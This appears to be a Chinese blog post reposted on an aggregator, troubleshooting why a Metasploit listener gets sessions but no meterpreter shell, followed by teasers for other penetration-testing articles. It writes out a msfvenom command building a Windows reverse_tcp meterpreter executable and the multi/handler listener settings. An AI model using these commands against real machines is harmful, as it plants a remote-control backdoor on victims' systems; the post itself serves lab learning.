代码编织梦想

msf中收到了sessions却不反弹meterpreter的原因

问题描述:

生成木马

​msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp
lhost=192.168.189.130 lport=12346 -f exe >/hack.exe

监听并激活

use exploit/multi/handler‍‍

进入监听模块exploit/multi/handler​是一个后门模块,配置一个反弹会话处理程序

set payloads windows/meterpreter/reverse_tcp

设置payload反弹,切记不是payloads(我这里的命令有误,这也是我这次出错的原因,下方文章会有解释)

(在开始攻击的时候要木马文件在被攻击的目标系统运行才能攻击成功)

set lhost 192.168.189.130
set lport 12346
exploit

在这里插入图片描述

原因如下:

我的原因是因为把

set payload windows/meterpreter/reverse_tcp

输错成了

set payloads windows/meterpreter/reverse_tcps

多输入了个s

实验过程如下

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接: https://blog.csdn.net/Xionghuimin/article/details/110453369

运用IP代理技术来保护自身网络安全-爱代码爱编程

互联网的快速发展让工作学习乃至生活都发生了翻天覆地的变化,获取信息的途径也得到了进一步提升,现在可以通过网络快速地来获取到自己想要的信息,但与此同时我们也要更加注意个人信息安全的保护,而使用IP代理保护自身网络安全则是现如今最简单稳定的方法。 用户在每次连接IP海IP代理的时候,联网设备的IP地址都会随之发生变化,这些IP都来自代理IP,不是用户的真实IP

学习CTF(二进制安全)一个月多的奇妙冒险~;-爱代码爱编程

为什么选择CTF? List 1 博主今年大二,因为疫情在家度过了半年的时光,开学就懵逼的开始了大二的生活, 大一贪玩,没学多少东西,记得学了C语言刷了一些题什么的,大一下就是在家的那段日子屁都没学 (0.0),考试蒙混过关,于是那半年就荒废啦,在家感觉特别闲,闲到郁闷的那种,我就常常思考我以后该什么办,下定决心开学后要学点东西,不能再老打游戏了.

Kali Linux基础操作学习篇——cp命令(二)-爱代码爱编程

一、课程背景 相较通过图形界面执行计算机命令,使用命令行模式执行相应操作,能够更好地节约计算机资源,迅速提升计算机运行效力。Kali Linux命令如同中文的拼音,英文的单词,虽然学习过程可能繁杂枯燥,但它是一切学习的基础,是决定最终学习高度的基石。无论今后是否进入计算机领域工作,熟练掌握Linux相关命令,都将有助于提升您的工作效率、工资薪金。 二、课

Web渗透测试之HTTP头部注入:Host实现身份验证绕过-爱代码爱编程

文章目录 前言题目分析总结 前言   本篇将讲解在Host参数存在注入漏洞时,如何利用burpsuite修改Host参数实现身份验证绕过并达到我们想要的目的。 题目分析 题目页面如下:   既然要利用Host参数实现注入操作,那么就必须得先确认Host是否存在可注入漏洞。有时为了防止服务器收到无法识别的域名请求,会将服务器配置为后备选项。

便宜的国内OCSP SSL证书-爱代码爱编程

随着全球各行各业的数字化飞速发展,我们享受着扫码支付,人脸识别等信息技术带来的便捷服务同时,也面临着一系列的网络安全威胁挑战。而中国作为网络大国,高度重视国内网络安全,在2019年5月发布网络安全等级保护制度2.0(简称等保2.0)。 在等保2.0中表示,不管是政府机关,高校或是企业,都应该积极履行自身的网络安全义务,并且明确提出某些层面需要使用密码技术

应急响应之勒索病毒自救指南-爱代码爱编程

经常会有一些小伙伴问:中了勒索病毒,该怎么办,可以解密吗? 第一次遇到勒索病毒是在早几年的时候,客户因网站访问异常,进而远程协助进行排查。登录服务器,在站点目录下发现所有的脚本文件及附件后缀名被篡改,每个文件夹下都有一个文件打开后显示勒索提示信息,这便是勒索病毒的特征。 出于职业习惯,我打包了部分加密文件样本和勒索病毒提示信息用于留档,就在今天,我又重

CVE-2020-0796漏洞利用-爱代码爱编程

CVE-2020-0796漏洞利用 漏洞背景 微软3月11日发布,披露地址: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0796 此次漏洞很接近2017年的永恒之蓝漏洞(ms17_010),都是利用445端口的SMB进行攻击 而且攻击者可以构造特定的网页,压缩包,共享目录,OFF

DC-2靶机渗透实战-爱代码爱编程

主机渗透系统: kali linux 靶机: DC-2 渗透过程: 先扫网段内存活主机,发现192.168.1.41是靶机ip 扫描靶机所有开放的端口 然后访问80端口的服务,这里根据靶机下载页面上面的提示需要设置hosts文件 访问页面是一个wordpess,找到flag1 它提示登录找到下一个flag,也提示了cewl

DC-1靶机渗透实战-爱代码爱编程

下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: kali linux 渗透过程: nmap全扫存活主机及端口 nmap -sV 192.168.1.1/24 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-02IpjkFX-1606813457741)

【渗透笔记】Windows主机信息收集-爱代码爱编程

在拿到webshell的时候,想办法获得系统信息拿到系统权限,进入到网络系统内部之后收集内部网络的各种信息,获取内部网络有价值的人员、资产信息。 内网渗透的第一步,内网信息收集。 环境搭建 ATT&CK靶场二 内网环境分析 内网基础环境判断 IP、网关、DNS、是否能联通外网、网络连接以及端口、本机host文件、机器的代理、是否在域内、

细谈渗透测试的前期工作——信息收集-爱代码爱编程

细谈渗透测试的前期工作——信息收集 前言0x01 收集什么信息0x02 作用和收集方法总结 前言 都说学安全的,查资料找信息什么的都是基本功,收集信息的能力都是杠杠的,经常网上有什么热门的事情,小伙伴们都会来找我帮他们找点瓜吃,也常常让我帮忙找特定的一些岛国教育资料,真是工具人实锤了。。咳咳扯远了,扯远了。 所谓知己知彼,百战不殆,要做好渗透

DVWA在Mac上的安装配置-爱代码爱编程

DVWA在Mac上的安装配置 此处使用的是XAMPP+DVWA 刚开始配置DVWA,在网上找了一大波教程,其中有几个步骤总是有点懵逼,所以自己写了一个比较简单的配置步骤,希望对大家的学习有帮助。 一、解压安装DVWA XAMPP下载地址DVWA下载地址 安装XAMPP,与普通应用安装相同 安装好之后运行XAMPP 在Services中打